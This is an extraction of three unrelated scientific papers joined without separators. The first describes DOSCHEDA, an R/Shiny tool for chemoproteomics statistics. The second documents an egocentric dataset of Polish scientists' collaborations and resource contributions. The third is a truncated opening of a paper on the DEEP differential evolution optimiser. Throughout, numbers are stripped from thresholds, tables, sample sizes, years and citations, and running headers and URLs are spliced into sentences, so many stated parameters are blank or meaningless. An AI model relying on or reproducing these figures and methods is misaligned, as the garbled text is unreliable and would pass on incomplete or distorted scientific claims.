based on this, we have developed a shiny-based web application named doscheda (down stream chemoproteomics data analysis), which includes: (i) open-source code available on bioconductor for r users; (ii) a user-friendly graphical user interface (gui) with no programming knowledge required; (iii) a traffic-light system to enable the user to rapidly identify and address data incongruences; (iv) an os-independent implementation which generates a comprehensive final report in addition to the analysis results; (v) a flexible data-input routine which enables the user to import different file types (.txt, .xlsx, .csv), typically exported from ms software such as proteome discoverer or maxquant; (vi) flagging of proteins found in the crapome contaminant repository database (mellacheruvu et al., ). doscheda addresses the need to perform fit-for-purpose statistical analysis of chemoproteomics experiments, including linear and non-linear models, to provide a ranking of the protein(s) most competed by the investigational compound (the competitor), as well as to generate standardized results that can be further used for downstream analysis or for comparisons between different experiments.

table : required inputs for doscheda.
peptide intensities: from pd . , peptide qvality score, protein accessions, peptide names, intensities; not from pd . , peptide qvality score, protein accessions, peptide names, intensities.
fold changes: from pd . , protein fold changes; not from pd . , protein accessions, protein fold changes, unique peptides.
log-fold changes: from pd . , protein log-fold changes; not from pd . , protein accessions, protein log-fold changes, unique peptides.

implementation
doscheda is implemented using r (r core team, ), an open-source software environment for statistical computing, and coded in shiny (chang et al., ). doscheda processes the data based on a series of pipelines developed and integrated into the application. the user selects which pipeline is executed based on the experimental design and the data input.

data input
the application is designed to take three different types of data:
1. peptide intensities. these are obtained from proteome discoverer, maxquant or similar software. the same procedure applied in proteome discoverer . has been implemented in doscheda for summing the reporter ions to obtain protein relative quantification. the protein fold changes [ctrl]/[treated] are then converted to log scale and passed into the pipeline.
2. fold changes. these are the protein fold changes, [ctrl]/[treated].
3. log fold changes. these are the log protein fold changes.
doscheda has been optimized for proteome discoverer . (pd . ), but it can also use data from other software, given that the input file contains the specific columns described in table .

statistical analyses
the experimental design, as shown in table , determines the type of analysis that can be performed in doscheda. the standard pipeline utilizes a linear model with a quadratic form f(x) = a0 + a1·x + a2·x², where a0 is the intercept, a1 the slope and a2 the quadratic coefficient. this pipeline is suitable for experimental designs with less than  channels ( -plex) and more than  replicate (table ). increasing free drug concentrations and the generation of a dose-response relationship with the protein target(s) provide information about specific drug-target interactions.
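to make the quadratic form concrete, the following minimal r sketch fits it to the log fold-changes of a single protein with ordinary least squares; the toy vectors x and lfc are hypothetical, and the sketch only illustrates the functional form rather than the limma-based implementation that doscheda actually uses (described next).

    # minimal sketch (not doscheda code): quadratic fit for one protein
    x   <- 1:6                                          # channel index or (log) competitor concentration
    lfc <- c(0.02, -0.15, -0.40, -0.85, -1.50, -2.05)   # toy log fold-changes for one protein
    fit <- lm(lfc ~ x + I(x^2))                         # a0 + a1*x + a2*x^2
    coef(fit)                                           # estimated a0, a1, a2
    summary(fit)$coefficients[, "Pr(>|t|)"]             # p values for intercept, slope and quadratic term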
the linear model analysis implemented in doscheda using the limma r package (smyth, ) will identify proteins with a significant p value (slope, intercept, quadratic) as the protein drug-target(s). alternatively, in cases where biological input material is not a limiting factor, chemoproteomics experiments consist of a full-scale dose-response, in which  or more concentrations are tested (e.g., -plex or -plex). in this case, the user can run the sigmoidal pipeline, where the four-parameter log-logistic (ritz et al., ) model is applied (table ).

table : type of analysis performed in doscheda.
                        1 replicate         more than 1 replicate
less than  channels     not enough data     linear model
 or more channels       sigmoidal           linear model

here, the p values of the model parameters (min, max, slope, rb ) will be computed to rank proteins based on their selectivity profile (smyth & collins, ). the half-maximal residual binding (rb ) is a measure of the effectiveness of a drug in binding to a protein. thus, this quantitative measure indicates how much of a drug or small molecule is needed to saturate binding to a protein by half, and it can be used to compare drug-protein profiles. the rb values are typically expressed as molar concentrations and are computed in the sigmoidal pipeline for each protein within doscheda. furthermore, the corrected rb , according to daub ( ), corresponds to the ratio (r) of the proteins enriched in the second incubation (supernatant) versus those retained in the first incubation (dmso or blank) with the affinity matrix. this pulldown-of-pulldown or depletion factor (r) enables the calculation of a kd for each protein and is part of doscheda's outputs.

peptide removal process using pearson correlation
when peptide intensities and two replicates are available, doscheda implements a step prior to the peptide aggregation process to account for potential technical experimental errors. the peptide removal function is tailored to the typical chemoproteomics experimental design and aims to leverage the empirical peptide information of the experimental replicates, avoiding data imputation or the use of spectral features of peptides (fischer & renard, ), as these are not necessarily available to the final user. the peptide removal algorithm is described in fig. ; in this procedure, peptides that are inconsistent (e.g., anti-correlated) between replicates are excluded. this implementation is not intended to address ratio compression (savitski et al., ) but to leverage the information available on the same peptide between the two replicates. in fact, the peptide removal process is based on the calculation of the pearson correlation coefficient between the abundances of the same peptide in the two replicates, as a pre-filtering step before summing the remaining peptide intensities to finally infer back the protein abundance. initially, the peptides are filtered by their peptide quality score (qs < . ) column, a mandatory input column in this case. next, the data are filtered to have a minimum of  peptides (shared or unique) per protein and per replicate, such that the pearson correlation coefficient (r) can be calculated between matched peptides. peptides with r < . are removed and summed intensities are computed from the remaining peptides; although this cut-off can be modified by the user within doscheda, we observed that . is a reasonable default threshold that removes extreme peptide quantifications (e.g., low-correlated and anti-correlated peptides) and keeps the proteome coverage almost unchanged, as shown in fig. (r < . ).
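as a rough illustration of the filtering step just described (and not the exact doscheda implementation), the following r sketch computes a per-peptide pearson correlation between two hypothetical replicate intensity matrices of one protein and sums the retained peptides into protein-level intensities; the objects rep1 and rep2 and the cut-off argument are placeholders.

    # sketch of a replicate-correlation filter; rep1/rep2 are numeric matrices
    # (rows = matched peptides of one protein, columns = tmt/itraq channels)
    filter_peptides <- function(rep1, rep2, r_cutoff) {
      stopifnot(nrow(rep1) == nrow(rep2))
      r <- vapply(seq_len(nrow(rep1)),
                  function(i) cor(rep1[i, ], rep2[i, ], method = "pearson"),
                  numeric(1))
      keep <- !is.na(r) & r >= r_cutoff                  # drop low- or anti-correlated peptides
      list(kept_peptides = which(keep),
           protein_rep1  = colSums(rep1[keep, , drop = FALSE]),
           protein_rep2  = colSums(rep2[keep, , drop = FALSE]))
    }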
figure : schematic of the peptide removal process algorithm.

table : summary of the scenarios handled by the peptide removal process.
prot. name   peptides rep 1   peptides rep 2   pearson correlation coefficient    action
protein      a, b             a, b             ra > . , rb > .                    no removal; the summed intensities are computed as in pd .
protein      a, b             a                null                               lack of peptide measurements; the protein will be removed
protein      a, b, c          a, b, c          ra > . , rb > . , rc < .           a and b are considered and summed; c is removed as a source of noise in the data
notes: a, b and c in the real case scenario are peptide sequences.

intuitively, larger r values will translate into more peptides being removed and, consequently, more proteins being lost, as shown in figs. a– d. the r cut-off can be adjusted by the user within doscheda, allowing a quick comparison of results in a similar fashion to fig. and empowering the analyst to fine-tune this threshold based on the project aims. finally, only proteins with more than one unique peptide are retained for the downstream analysis. table summarizes all the possible scenarios handled by the peptide removal function.

figure : effect of different pearson coefficient cut-offs. x- and y-axes are log fold changes. the total number of proteins , (a, %) reduces to , with pearson coefficient r = . (b, ∼ %), , with r = . (c, ∼ %), and with r = . (d, %).

the user should initially run the exploratory data analysis in doscheda up to the principal component analysis (pca) and the correlogram plot to evaluate the correlation between replicates. only at this point can the user make an informed decision whether to apply the peptide removal function or continue to analyze the data without applying the removal process. yet, being an open-source tool, the peptide removal process could be replaced by any other similar function available in the literature (see the doscheda bioconductor vignette).

additional features
the server version of doscheda comprises additional uploads that are useful when researchers are comparing datasets, including: (i) intersections of the enriched proteins with a user-uploaded geneid list (e.g., protein kinases); (ii) a default mapping from uniprot accessions to geneids using intermine; if the organism of interest is not present in the drop-down list, doscheda allows the user to specify the mapping file. furthermore, doscheda offers: (i) two normalization/scaling options (see the doscheda manual); (ii) interactive d plots with user-defined x- and y-axes; (iii) quality control (qc) traffic-light flags; (iv) downloadable results and a detailed report of the analyses.

figure : doscheda workflow.

results
doscheda generates a variety of different plots depending on the user's data input, as outlined in fig. . overall there are two sets of output plots, one designed for quality control (qc) and the other to visualize the results of the analyzed data.
the doscheda application provides standard qc plots such as box, whisker plots, data distributions within each itraq/tmt channel, correlogram plots to quantify the correlation between replicates, a d-plot to verify the variance independence from the data mean, and a plot of the first two principal components. based on the qc outcomes, if data are consistent the user can proceed to the inspection of the statistical analysis results, otherwise, if peptide intensities are available the peptide removal process can be applied. for the analysis, depending on the chosen statistical model, doscheda will generate different outputs. in case of a linear model the p values distributions for the three coefficients (a , a and a ) and their corresponding interactive volcano plots are displayed. in case of a sigmoidal model doscheda will output three plots: the first showing the sigmoidal curves with a difference higher than % between the top and the bottom value; the second and the third showing the proteins that have a significant rb (p value < . ) and a significant slope (p value < . ), respectively. independently of the applied statistical model, the r package d heatmap is used to generate an interactive heatmap of the input data. contrino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure doscheda traffic lights flags system. two types of qcs’ are available, type based on pair- wise samples correlation obtained from the correlogram plot (a–c) and, type based on model’s p val- ues coefficients (d–e) obtained by running the linear or sigmoidal statistical analysis. in both types, green flags will be displayed when there is no anti-correlation between any samples and the number of pro- teins with p value(s) < . is larger than zero. on the contrary orange flags will be displayed when anti- correlation is observed (b) in at least one of the pairwise samples (i.e., pearson correlation coefficient, r < ) and/or there are no proteins that passes the threshold of p value(s) < . (f). once the analysis has been completed, the summary section of the application allows the user to visualize the results in a table format, where functions like ‘‘search’’ and ‘‘sorting’’ are also enabled for quick queries. the summary section contains quality control (qc) traffic light flags with green for data consistency and orange for data incongruences with an accompanying warning message. there are two types of traffic lights flags; see fig. . finally, in the download section of the application the user can download (i) a .csv file containing the results of the analysis which also includes the user-input dataset and (ii) an html report with all the plots produced in the current run, the key tables as well as the session information to facilitate data reproducibility. conclusion doscheda enables researchers with limited programming experience to perform, evaluate, and interactively visualize chemoproteomics data analysis. doscheda includes linear and non-linear statistical analysis whose results can be exported in excel spreadsheet format. also, the user will be able to generate a full report of the executed data analysis, facilitating data reproducibility. being open source, doscheda can be easily extended and modified to fit specific additional analyses. 
availability and requirements doscheda server lives at https://doscheda.shinyapps.io/doscheda/ and it will be constantly maintained by the authors; the users by following the link above can upload and analyze their own datasets without additional requirements. finally, to facilitate traceability and reproducibility doscheda is also available as an open source bioconductor package. contrino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doscheda.shinyapps.io/doscheda/ http://dx.doi.org/ . /peerj-cs. abbreviations doscheda down stream chemoproteomics data analysis qc quality controls itraq isobaric tag for relative and absolute quantitation tmt tandem mass tag ms mass spectrometry gui graphical user interface acknowledgements we thank dr. ian barrett from the discovery sciences quantitative biology group for the critical review of the manuscript. additional information and declarations funding this work was supported by astrazeneca r&d, quantitative biology, cambridge, united kingdom. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: astrazeneca r&d, quantitative biology, cambridge, united kingdom. competing interests bruno contrino, eric miele, ronald tomlinson, m. paola castaldi, and piero ricchiuto are employees of discovery science, astrazeneca. author contributions • bruno contrino analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work. • eric miele performed the experiments, contributed reagents/materials/analysis tools. • ronald tomlinson contributed reagents/materials/analysis tools, reviewed drafts of the paper. • m. paola castaldi contributed reagents/materials/analysis tools, reviewed drafts of the paper. • piero ricchiuto conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the code, manual, walkthrough descriptions and dummy data are available here: https://github.com/brunocontrino/doscheda_app. bioconductor repository and package status: https://github.com/bioconductor/contributions/issues/ . contrino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/brunocontrino/doscheda_app https://github.com/bioconductor/contributions/issues/ http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references bantscheff m, boesche m, eberhard d, matthieson t, sweetman g, kuster b. . robust and sensitive itraq quantification on an ltq orbitrap mass spectrometer. mol cell proteomics ( ): – doi . /mcp.m -mcp . bantscheff m, drewes g. . chemoproteomic approaches to drug target identi- fication and drug profiling. bioorganic & medicinal chemistry ( ): – doi . /j.bmc. . . . bantscheff m, eberhard d, abraham y, bastuck s, boesche m, hobson s, mathieson t, perrin j, raida m, rau c, reader v, sweetman g, bauer a, bouwmeester t, hopf c, kruse u, neubauer g, ramdsen n, rick j, kuster b, drewes g. . quantitative chemical proteomics reveals mechanisms of action of clinical abl kinase inhibitors. nature biotech : – doi . /nbt . chang w, cheng j, allaire j, xie y, mcpherson j. 
. shiny: web application framework for r. r package version . . available at http://cran.r-project.org/ package=shiny. choi m, chang cy, clough t, broudy d, killeen t, maclean b, vitek o. . msstats: an r package for statistical analysis of quantitative mass spectrometry-based proteomic experiments. bioinformatics ( ): – . cox j, mann m. . maxquant enables high peptide identification rates, individualized p.p.b.-range mass accuracies and proteome-wide protein quantification. nature biotechnology : – doi . /nbt. . daub h. . quantitative proteomics of kinase inhibitor targets and mechanisms. chamical biology (acs) : – doi . /cb . fischer m, renard by. . ipqf: a new peptide-to-protein summarization method us- ing peptide spectra characteristics to improve protein quantification. bioinformatics ( ): – doi . /bioinformatics/btv . jones lh, neubert h. . clinical chemoproteomics—opportunities and obstacles. science translational medicine ( ):eaaf doi . /scitranslmed.aaf . kou q, xun l, liu x. . toppic: a software tool for top-down mass spectrometry- based proteoform identification and characterization. bioinformatics ( ( )) – . maclean b, tomazela dm, shulman n, chambers m, finney gl, frewen b, kern r, tabb dl, liebler dc, maccoss mj. . skyline: an open source document editor for creating and analyzing targeted proteomics experiments. bioinformatics ( ): – doi . /bioinformatics/btq . manning. . the protein kinase complement of the human genome. science : – doi . /science. . contrino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /mcp.m -mcp http://dx.doi.org/ . /j.bmc. . . http://dx.doi.org/ . /nbt http://cran.r-project.org/package=shiny http://cran.r-project.org/package=shiny http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /cb http://dx.doi.org/ . /bioinformatics/btv http://dx.doi.org/ . /scitranslmed.aaf http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. martinez md, nordlund p. . the cellular thermal shift assay: a novel biophysical assay for in situ drug target engagement and mechanistic biomarker studies. annual review of pharmacology and toxicology : – doi . /annurev-pharmtox- - . mellacheruvu d, wright z, couzens al, lambert jp, st-denis na, li t, miteva yv, hauri s, sardiu me, low ty, halim va, bagshaw rd, hubner nc, al-hakim a, bouchard a, faubert d, fermin d, dunham wh, goudreault m, lin zy, badillo bg, pawson t, durocher d, coulombe b, aebersold r, superti-furga g, colinge j, heck aj, choi h, gstaiger m, mohammed s, cristea im, bennett kl, washburn mp, raught b, ewing rm, gingras ac, nesvizhskii ai. . the crapome: a contaminant repository for affinity purification mass spectrometry data. nature methods : – doi . /nmeth. . r core team. . r: a language and environment for statistical computing. vienna: r foundation for statistical computing. available at http://www.r-project.org. ritz c, baty f, streibig jc, gerhard d. . dose-response analysis using r. plos one ( ):e doi . /journal.pone. . savitski mm, mathieson t, zinn n, sweetman g, doce c, becher i, pachl f, kuster b, bantscheff m. . measuring and managing ratio compression for accurate itraq/tmt quantification. journal of proteome research ( ): – doi . /pr r. schirle m, bantscheff m, kuster b. . mass spectrometry-based proteomics in preclinical drug discovery. chemistry and biology ( ): – doi . /j.chembiol. . . . smyth gk. . 
linear models and empirical bayes methods for assessing differential expression in microarray experiments. statistical applications in genetics and molecular biology : article . smyth la, collins i. . measuring and interpreting the selectivity of protein kinase inhibitors. journal of chemical biology ( ): – doi . /s - - - . tyanova s, temu t, sinitcyn p, carlson a, hein my, geiger t, mann m, cox j. . the perseus computational platform for comprehensive analysis of (prote)omics data. nature methods : – doi . /nmeth. . wang p, yang p, yang jy. . ocap: an open comprehensive analysis pipeline for itraq. bioinformatics ( ): – doi . /bioinformatics/bts . wieczorek s, combes f, lazar c, gianetto qg, gatto l, dorffer a, hesse am, couté y, ferro m, bruley c, burger t. . dapar & prostar: software to perform statistical analyses in quantitative discovery proteomics. bioinformatics ( ): – doi . /bioinformatics/btw .

© authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /).
issue | vol. article | doi: . /connections- . connections
academic collaboration via resource contributions: an egocentric dataset
michał bojanowski, ,* dominika czerniawska and wojciech fenrich
kozminski university, warsaw, poland. university of manchester, manchester, uk and university of warsaw, warsaw, poland. university of warsaw, warsaw, poland.
*e-mail: michal @gmail.com
abstract
in order to understand scientists' incentives to form collaborative relations, we have conducted a study looking into academically relevant resources, which scientists contribute into collaborations with others. the data we describe in this paper are an egocentric dataset assembled by coding originally qualitative material. it is multiplex ego networks containing data on individual attributes (such as gender, scientific degree), collaboration ties (including alter–alter ties), and resource flows.
resources are coded using a developed inventory of types of academically relevant resources that egos and alters contribute into their collaborations. we share the data with the research community in the hope of enriching the knowledge and tools for studying sociological and behavioral aspects of science as a social process.
keywords collaboration networks, resources, sociology of science, ego networks.

scientometric studies report a steadily increasing trend in multi-authored scientific publications. this is clear evidence that contemporary science requires cooperation and is no longer a traditionally individualistic activity (moody, ). the presented data set comes from a study in which our overarching research goal was to understand why some scientists collaborate while others do not. in particular, our approach was to think about the incentives that might lead them to do so. inspired by coleman ( ) and, among others, laudel ( ) and lewis et al. ( ), as well as our earlier results (czerniawska et al., ), we assume that the incentives to collaborate come from the academically relevant resources that scientists possess or control and the interest they might have in resources possessed or controlled by others. for example, a theorist and an experimentalist might be interested in each other's resources – the ability to develop a theoretical model of the studied problem and the skills to conduct experiments, respectively. the unequal distribution of these resources across the academic community and the necessity of pooling them to get ahead in contemporary science result in incentives to collaborate. the current state of knowledge still lacks a universally accepted behavioral understanding of the scientific process, let alone standardized tools for measuring academically relevant resources. hence, we conducted a qualitative study among polish scientists with the goals to:
1. collect egocentric data on collaborative relations;
2. develop an inventory of academically relevant resources from respondents' reports; and
3. measure what resources (item ) collaborating parties (ego and alters) engage in their collaboration ties (item ).
the data we hereby share are based on transcriptions and coding of the originally qualitative material. the second section provides some brief background information on science in poland and details our contribution. the presented study involved interviews conducted on a sample of polish scientists,
the organization and institutions of polish scientific system resemble “continental” systems (e.g. german scientific system). a typical scientific career requires a four year phd program, a habilitation which is expected within eight years after a phd. obtaining a habilitation is perceived as the final step to becoming an independent scholar. polish scientific community, similarly to many other scientific communities in europe, is rather diverse. it is a mix of modern, competitive, internationalized disciplines and groups, and more conservative locally oriented areas (kwiek, ). explaining the presence or absence of collabo- ration relations among scientists by referring to complementarities between them is not a new idea. for example, qin et al. ( ) in their bibliometric analysis use institutional affiliation to capture different specialization of scientists. moody ( ) approximates different types of contributions by analyzing subject codes put on articles indexed by sociological abstracts. our goal was to collect a list of resources they believe are relevant when working as a scientist. we believe a genuine contribution of the presented data set lies in that detailed information on the flow of resources in scientific collaborations. the catalogue, which is a unique contribution in scientific collaboration studies, was constructed based on the extensive literature review and themes mentioned by our interviewees. the data have been used to study whether structurally non-redundant ties are more likely to be characterized with resource contributions not found in other ties (bojanowski and czerniawska, ). sample data come from individual in-depth interviews (idi) conducted between april and august by two interviewers. the quota sample consists of female and male scientists from six polish cities. respondents represented a broad range of disciplines: natural sciences, social sciences, life sciences, the humanities, engineering, and technology on different levels of career from phd candidates to professors. the interviewees mentioned collaborators in total. interviews lasting between and min were recorded and later transcribed. measurement each interview consisted of several parts, three of which are of relevance here: . respondents were asked to name up to important researchers they have collaborated with during last five years. each collaborator was discussed separately giving information about gender, scientific degree, nationality, and university department (if possible). see section . below. . during the interview a network of collaboration among collaborators mentioned in item ( ) was reconstructed using cork board, pins, and rub- ber bands. see the example in figure . cork boards were photographed and later digitized into edgelist data. see section . below. . for each collaborator, the respondents were asked about academically relevant resources he/she contributed to the collaboration and what resources were contributed by the col- laborator. interviewees were provided with a broad framework, which would help them iden- tify resources such as financial resources (e.g. funding), human resources (e.g. knowledge, skills), and social resources (e.g. collaborators). . interviews were audio-recorded and later transcribed. the text of the transcripts was analyzed using qda miner lite in order to code a product of provalis research, see https://provalisresearch. com/products/qualitative-data-analysis-software/. at https://recon-icm.github.io/reconqdata/articles/resource_ inventory.html. 
resources engaged by respondents (the egos) and their collaborators (the alters) to every collaboration. the coding was performed by two persons. a random sample of the interviews was double-checked by different researchers to ensure reliability. the data are available in table resources and described in detail below. while collaboration networks assembled from part ( ) include alter–alter ties, the data on resources from part ( ) were acquired for ego–alter dyads only. structure of the data the data are contained in three inter-related tables diagrammatically presented in figure . below we describe each table in detail. node attributes the table nodes contains information about every person in the study – all egos and all alters. it has rows and the following seven variables: • id_interview – interview identification number. • id_node – person identification number, unique within each interview. • is_ego – binary variable equal to 1 if the person is the ego (respondent), 0 otherwise. • is_polish – binary variable equal to 1 if the person is affiliated with a polish academic institution, 0 otherwise. • department – marks scientists who work at the same department. if department is not missing, then all scientists within the same interview sharing the same value of department work at the same department at the same university. • scidegree – scientific degree of the scientist. one of “mgr” = ma, “dr” = phd, “drhab” = habilitated doctor, or “prof” = full professor. • female – binary variable equal to 1 if the person is female, 0 if male. the pair of variables id_interview and id_node together constitutes a key uniquely identifying each row in the nodes table. collaboration networks the table collaboration is essentially an edge list of collaboration ties. it has , rows and the following three variables: • id_interview – interview identification number. figure : using cork board, pins, and rubber bands to collect data on collaborations. small cards contained names or nicknames which have been masked. figure : the data consist of three interrelated tables. table ‘nodes’ contains information about all persons. table ‘collaboration’ is an edgelist of collaboration ties. table ‘resources’ is a multiplex edgelist of resource flows. • from and to – person identification numbers referencing the id_node variable from the nodes table. in other words, a row consisting of values, say, id_interview = , from = , to = indicates that researchers and were reported as collaborating in interview . resource contributions data about resources engaged by respondents (egos) and their collaborators (alters) in every collaboration were coded based on the transcripts. the data are provided in table resources, which has , rows and the following four columns: • id_interview – interview identification number. • from and to – person identification numbers (within each interview) referencing the id_node variable from the nodes table. • code – a textual code identifying the type of resource contributed by researcher from into the collaboration with researcher to. resources engaged in collaborations (variable code) were coded with a coding scheme covering different elements of a research process in different disciplines. the scheme consists of codes such as: • ‘conceptualisation’ – coming up with an idea for a study, providing a general theoretical framework; designing a general framework for a study.
• ‘methodology’ – designing methodology for a study. • ‘investigation’ – conducting research, gather- ing data. • ‘data analysis’ – data analysis, quantitative as well as qualitative. • ‘data curation’ – managing and archiving data. • ‘software creation’ – writing software for re- search process. • ‘prototype construction’ – building a proto- type that is used in research process. complete list of codes together with examples of coded interview fragments is available at the website. table . frequencies of gender and scientific degree for egos and alters. symbol ‘–’(dash) corresponds to missing data. gender degree alter ego female full professor female habilitated phd female ma female phd male full professor male habilitated phd male ma male phd – ma – – phd – – – – selected descriptives as a glimpse into the data, table shows frequency distribution of gender and scientific degree for egos and alters separately. figure shows resource flow networks from one of the interviews: accessing the data the data are available in a github repository at https://recon-icm.github.io/reconqdata as an r package with accessible files in a csv format. users can use the data with r by installing the package or download the data files in csv format using urls provided in the readme file. discussion we close by discussing potential uses and limitations of the documented data set. we think that the data we share can be used in several contexts with substantive and methodological goals in mind. on the substantive side, the data can be used to address several research questions. for example to analyze co-appearance of different types of resources in collaboration ties – certain https://recon-icm.github.io/reconqdata/articles/resource_ inventory.html. connections figure : collaboration (dashed, undirected) and resource flow (solid, directed) ties from one of the interviews. types of resources tend to be contributed together. further, the resource catalog could be improved and perhaps serve as a starting point for constructing a more standardized survey instrument. on the methodological side, the value of the data set is that it is egocentric and multiplex at the same time. we see active development in statistical models for data collected through egocentric design (krivitsky and morris, ) as well as in modeling multilayer networks (krivitsky et al., ). the data we share can be a useful test bed for such models. the data have certain limitations. first, it comes from a qualitative study conducted on a quota sample. the obvious limitation is the lack of representativeness in the strict statistical sense. nevertheless, it is representative in the loose sense – the respondents come from universities from different regions and of different size, from different disciplines and at different stages of scientific career. we believe it does cover the diversity of scientific positions pretty well. second, the data contain several instances of resource flows between the alters. however, the reliability of this data is rather low. majority of respondents did not have enough information or were otherwise not confident enough in reporting the resource contributions. consequently, these data were not collected systematically. acknowledgments the authors thank (polish) national science cen- tre for support through sonata grant / /d/ hs / for the project dynamics of competition and collaboration in science: individual strategies, collaboration networks, and organizational hierar- chies (http://recon.icm.edu.pl). 
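as a usage illustration of the three tables documented in the “structure of the data” section above, the following short python sketch loads them and assembles the collaboration network and the multiplex resource-flow network for a single interview. it is illustrative only: the local file names and the interview identifier are hypothetical placeholders (the actual download urls are listed in the package readme), and only the column names described above (id_interview, id_node, from, to, code) are assumed.

```python
# minimal sketch, assuming the three csv files described above were downloaded
# locally; "nodes.csv", "collaboration.csv", "resources.csv" and interview_id = 1
# are hypothetical placeholders.
import pandas as pd
import networkx as nx

nodes = pd.read_csv("nodes.csv")                   # id_interview, id_node, is_ego, ...
collaboration = pd.read_csv("collaboration.csv")   # id_interview, from, to
resources = pd.read_csv("resources.csv")           # id_interview, from, to, code

interview_id = 1

# undirected collaboration ties reported in one interview
people = nodes[nodes["id_interview"] == interview_id]
ties = collaboration[collaboration["id_interview"] == interview_id]
g = nx.Graph()
g.add_nodes_from(people["id_node"])
g.add_edges_from(zip(ties["from"], ties["to"]))

# directed, multiplex resource flows from the same interview
flows = resources[resources["id_interview"] == interview_id]
r = nx.MultiDiGraph()
r.add_nodes_from(people["id_node"])
for _, row in flows.iterrows():
    r.add_edge(row["from"], row["to"], code=row["code"])

print(g.number_of_edges(), "collaboration ties")
print(r.number_of_edges(), "resource contributions")
```

a representation of this kind makes it straightforward to relate structural properties of the ego network (for example, non-redundant ties) to the resource codes attached to each dyad, which is the type of analysis mentioned in the discussion above.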
references bojanowski, m. and czerniawska, d. . reaching for unique resources: structural holes and specialization in scientific collaboration networks. journal of social structure. forthcoming. preprint available on-line, available at: http://recon.icm.edu.pl/ wp-content/uploads/ / /exchange_networks.pdf. academic collaboration via resource contributions: an egocentric dataset coleman, j. s. . foundations of social theory, harvard university press, cambridge, ma. czerniawska, d. . sieci współpracy i wymiany w centrach i na peryferiach. przypadek polskiej nauki (phd thesis). university of warsaw, warsaw, poland. czerniawska, d., fenrich, w. and bojanowski, m. . actors, relations, and networks: scholarly collaboration beyond bibliometric measures. polish sociological review, : – . krivitsky, p. n. and morris, m. . inference for social network models from egocentrically sampled data, with application to understanding persistent racial disparities in hiv prevalence in the us. the annals of applied statistics, ( ): – . krivitsky, p. n., koehly, l. m. and marcum, c. s. . exponential-family random graph models for multi-layer networks. socarxiv, available at: https://doi.org/ . / osf.io/dqe b (accessed august , ). kwiek, m. . changing european academics: a comparative study of social stratification, work patterns and research productivity. routledge, london. kwiek, m. and szadkowski, k. . higher education systems and institutions, poland. in teixeira, p., shin, j. c., amaral, a., bernasconi, a., magalhaes, a., kehm, b. m. and nokkala, t. (eds), encyclopedia of international higher education systems and institutions, springer, pp. – , available at: https://doi.org/ . / - - - - _ - . laudel, g. . collaboration, creativity and rewards: why and how scientists collaborate. international journal of technology management, ( – ): – . lewis, j. m., ross, s. and holden, t. . the how and why of academic collaboration: disciplinary differences and policy implications. higher education, ( ): – . leydesdorff, l., wagner, c., park, h. w. and adams, j. . international collaboration in science: the global map and the network, available at: http:// arxiv.org/abs/ . (accessed august , ). moody, j. . the structure of a social science collaboration network: disciplinary cohesion from to . american sociological review, ( ): – . oecd. . oecd science, technology and r&d statistics: main science and technology indicators, available at: https://data.oecd.org (accessed august , ). qin, j., lancaster, f. w. and allen, b. . types and levels of collaboration in interdisciplinary research in the sciences. journal of the american society for information science, ( ): – . submitted november accepted june published august corresponding author konstantin kozlov, kozlov_kn@spbstu.ru, mackoel@gmail.com academic editor sandra gesing additional information and declarations can be found on page doi . /peerj-cs. copyright kozlov et al. distributed under creative commons cc-by . open access a software for parameter optimization with differential evolution entirely parallel method konstantin kozlov , alexander m. samsonov , and maria samsonova mathematical biology and bioinformatics lab, iamm, peter the great st. petersburg polytechnic university, st. petersburg, russia ioffe institute, saint petersburg, russia abstract summary. 
differential evolution entirely parallel (deep) package is a software for finding unknown real and integer parameters in dynamical models of biological processes by minimizing one or even several objective functions that measure the deviation of model solution from data. numerical solutions provided by the most efficient global optimization methods are often problem-specific and cannot be easily adapted to other tasks. in contrast, deep allows a user to describe both mathematical model and objective function in any programming language, such as r, octave or python and others. being implemented in c, deep demonstrates as good performance as the top three methods from cec- (competition on evolutionary computation) benchmark and was successfully applied to several biological problems. availability. deep method is an open source and free software distributed under the terms of gpl licence version . the sources are available at http://deepmethod. sourceforge.net/ and binary packages for fedora gnu/linux are provided for rpm package manager at https://build.opensuse.org/project/repositories/home:mackoel: compbio. subjects computational biology, distributed and parallel computing, optimization theory and computation keywords differential evolution, parameter optimization, mathematical modeling, parallelization, bioinformatics, open source software introduction the estimation of dynamical model parameters minimizing the discrepancy between model solution and the set of observed data is among the most important, widely studied problems in applied mathematics, and is known as an inverse problem of mathematical modeling (mendes & kell, ; moles, mendes & banga, ). numerical strategies for solutions of an inverse problems often involve optimization methods. many global and local, stochastic and deterministic optimization techniques, including the nature-inspired ones, have been developed and implemented in a wide range of free, open source and commercial software packages. mathematical modeling being one of the primary tools of computational systems biology provides new insights into the mechanisms that control the biological systems. it becomes very attractive to experimentalists due to predictive abilities of carefully selected models, if any. how to cite this article kozlov et al. ( ), a software for parameter optimization with differential evolution entirely parallel method. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:kozlov_kn@spbstu.ru mailto:mackoel@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://deepmethod.sourceforge.net/ http://deepmethod.sourceforge.net/ https://build.opensuse.org/project/repositories/home:mackoel:compbio https://build.opensuse.org/project/repositories/home:mackoel:compbio http://dx.doi.org/ . /peerj-cs. researchers benefit from the ability of a model to predict in silico the consequences of a biological experiment, which was not used for training. the properties of the model are determined by the structure of the 